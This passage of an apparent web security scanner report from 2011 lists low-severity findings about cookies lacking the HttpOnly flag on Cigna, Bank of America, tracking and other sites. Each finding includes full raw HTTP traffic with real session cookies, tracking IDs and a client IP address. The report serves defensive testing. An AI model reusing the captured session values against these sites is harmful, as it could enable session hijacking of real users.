Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; JSESSIONID=0001mmeItkCv4WhFhPcFW-cezLI:13agknsul; TLTHID=92964B127FD1107FCAD3A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:39 GMT
Content-length: 4668
Content-type: image/gif
Set-Cookie: TLTHID=989F512A7FD1107FCBACA536181C0CE6; Path=/; Domain=.cigna.com
Etag: "62a2347d-1-0-123c"
Last-modified: Mon, 19 Jan 2004 19:08:58 GMT
Accept-ranges: bytes

GIF89a..:.......D...........y.................c..9.......................n.................r..Y...........................z..........H..xxx.........,........W........d.................z...........<...
...[SNIP]...
8.70. https://sso.corp.cigna.com/corp/sso/images/arrow_orange.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/arrow_orange.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/arrow_orange.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:24 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "ef1cee75-1-0-3d"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA16587FD9107F089BA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

8.71. https://sso.corp.cigna.com/corp/sso/images/cigna_logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/cigna_logo.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/cigna_logo.jpg HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:26 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "38eba70c-1-0-9ae"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA4F9C7FD9107F089FA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

8.72. https://sso.corp.cigna.com/corp/sso/images/header_forgot_ID.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/header_forgot_ID.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/header_forgot_ID.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:32 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "7e42fb94-3-0-48c"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4A7E0907FD9107F0896A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

8.73. https://sso.corp.cigna.com/corp/sso/images/header_forgot_password.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/header_forgot_password.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /corp/sso/images/header_forgot_password.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=74B632B07FD1107FC7D4A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:42 GMT
Content-length: 1858
Content-type: image/gif
Set-Cookie: TLTHID=76094A447FD1107FC7EAA536181C0CE6; Path=/; Domain=.cigna.com
Etag: "50bef55a-8-0-742"
Last-modified: Sat, 10 Jan 2004 21:45:32 GMT
Accept-ranges: bytes

GIF89a..........k..7............q.............y...........Y..t..D..#y...............................................................................i.....D......n....c..........................Q......
...[SNIP]...
8.74. https://sso.corp.cigna.com/corp/sso/images/pshim.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/pshim.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/pshim.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:38 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "4c740010-1-0-327"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4A7FF807FD9107F0898A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

8.75. https://sso.corp.cigna.com/corp/sso/images/truesecure.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/truesecure.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/truesecure.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sun, 18 Jul 2010 14:12:02 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "8bbd1376-1-0-c0f"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA13387FD9107F089AA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

8.76. https://sso.corp.cigna.com/corp/sso/images/yahoo_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/yahoo_logo.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/yahoo_logo.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:44 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "c45c439f-1-0-65"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA49AC7FD9107F089EA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

8.77. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/includes/portal_styles.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/includes/portal_styles.css HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Wed, 21 Jan 2004 14:36:30 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
If-None-Match: "4ceaf758-1-0-a3d"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=4D8EA84A7FD9107F04F9A536181C0CE6; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:27:33 GMT
Set-Cookie: TLTHID=67A13BF87FD9107F05A8A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

8.78. https://sso.corp.cigna.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=76A27AB67FD1107FC7F0A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:46 GMT
Content-length: 318
Content-type: image/x-icon
Set-Cookie: TLTHID=78D4C8B67FD1107FC7FFA536181C0CE6; Path=/; Domain=.cigna.com

..............(.......(....... ................................................................................................................    .......................    ......    ...............    .........
...[SNIP]...
8.79. http://statse.webtrendslive.com/dcs4b71fc10000gs8u88h5t1k_6n2i/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcs4b71fc10000gs8u88h5t1k_6n2i/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs4b71fc10000gs8u88h5t1k_6n2i/dcs.gif?&dcsdat=1305559036807&dcssip=www.regions.com&dcsuri=/personal_banking/loans_credit.rf&dcsref=http://www.regions.com/personal_banking/email_starting_net.rf&WT.co_f=2fc78c79fedd795ea741305555382886&WT.vt_sid=2fc78c79fedd795ea741305555382886.1305558982886&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Regions%20|%20Loans%20and%20Credit&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1136x902&WT.fi=Yes&WT.fv=10.3&WT.tv=8.0.3&WT.sp=@@SPLITVALUE@@&WT.vt_f_tlh=1305559033 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/loans_credit.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAABAAAADroAAPo/0U3lP9FNAQAAAEkfAAD6P9FN5T/RTQAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 15:17:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAABAAAADroAAPw/0U3lP9FNAQAAAEkfAAD8P9FN5T/RTQAAAAA-; path=/; expires=Thu, 13-May-2021 15:17:16 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
8.80. http://statse.webtrendslive.com/dcspiqc94wz5bdfiwi4batkw3_5h6k/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcspiqc94wz5bdfiwi4batkw3_5h6k/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcspiqc94wz5bdfiwi4batkw3_5h6k/dcs.gif?&dcsdat=1305559757581&dcssip=cigna.com&dcsuri=/&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=CIGNA%20Health%20Insurance%20Company:%20Dental,%20Medical,%20Life%20%26%20Disability%20Benefits%20and%20Coverage&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1136x902&WT.fv=10.3&WT.slv=Unknown&WT.tv=9.3.0&WT.dl=0&WT.ssl=0&WT.es=cigna.com/&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vtvs=1305559757583&WT.vtid=173.193.214.243-1234505376.30151644&WT.co_f=173.193.214.243-1234505376.30151644 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAABAAAADroAABtA0U3lP9FNAQAAAEkfAAAbQNFN5T/RTQAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Mon, 16 May 2011 15:29:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcspiqc94wz5bdfiwi4batkw3_5h6k/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1305559757581&dcssip=cigna.com&dcsuri=/&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=CIGNA%20Health%20Insurance%20Company:%20Dental,%20Medical,%20Life%20%26%20Disability%20Benefits%20and%20Coverage&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1136x902&WT.fv=10.3&WT.slv=Unknown&WT.tv=9.3.0&WT.dl=0&WT.ssl=0&WT.es=cigna.com/&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vtvs=1305559757583&WT.vtid=173.193.214.243-1234505376.30151644&WT.co_f=173.193.214.243-1234505376.30151644
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAACAAAADroAABtA0U3lP9FNFf8AAM1C0U3NQtFNAgAAAEkfAAAbQNFN5T/RTXtQAADNQtFNzULRTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"

8.81. http://va.px.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115 HTTP/1.1
Host: va.px.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFxfHnn3MAv82n3vHwsXM8S8cAHevCXM="; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI3M119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"371390\": [1305550329+ \"TdEd9gAO8M4K5TsGkp5xaw==\"+ 64259+ 25503+ 517]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF4sZNZgFHi5+4j71gUGDV+3jv5jsWA0QLM5xLhePWZRYBJYu+NlUBZBg0GAwYLBgAi8hMl; io_freq_p1="eJzjEuZY4iTAKPFz95F3LAaMFmCaS5jjeKAAk8TeGyvfsSgwaDAYMFgwAAA8/Q25"; dp_rec="{\"2\": 1305550329}"

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 17:09:13 GMT
Set-Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFzPHv3AuLo49+5gFdq589Y4FAG34CUA=";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 15-May-2012 17:09:13 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1268516&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

8.82. http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_content_style_default2.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/stylesheet/hs2_mvc_content_style_default2.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/stylesheet/hs2_mvc_content_style_default2.css HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 16 May 2011 15:28:17 GMT
Content-length: 24401
Content-type: text/css
Last-modified: Sat, 11 Dec 2010 07:58:13 GMT
Etag: "5f51-4d032f15"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1648801451.20480.0000; path=/

/* top level font to cascade */
.standard-font {font-size: 71%; font-family: Verdana,Arial,Geneva,Helvetica,sans-serif;}
.standard-font2 {font-size: 90%; font-family: Verdana,Arial,Geneva,Helvetica,sa
...[SNIP]...
8.83. http://www.mycigna.com/rte/public/gatekeeper  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mycigna.com
Path:   /rte/public/gatekeeper

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rte/public/gatekeeper?TAM_OP=error&USERNAME=unauthenticated&ERROR_CODE=0x38cf0434&ERROR_TEXT=DPWWA1076E%20%20%20Privacy%20required&METHOD=GET&URL=%2Ffavicon.ico&REFERER=&HOSTNAME=www.mycigna.com&AUTHNLEVEL=&FAILREASON=&PROTOCOL=http&OLDSESSION= HTTP/1.1
Host: www.mycigna.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
content-language: en-US
content-length: 0
content-type: text/plain
date: Mon, 16 May 2011 15:29:50 GMT
location: http://www.mycigna.com/sslreq.html?page=/favicon.ico
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: TLTSID=56FD59747FD1107F1177E904CA5CCC5F; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=56FD59747FD1107F1177E904CA5CCC5F; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:29:50 GMT
Set-Cookie: PD_STATEFUL_d77a50f6-4b84-11e0-9e32-20548964aa77=%2Frte%2Fpublic; Path=/

8.84. http://www.placelocal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.placelocal.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.placelocal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/forgot_password.php
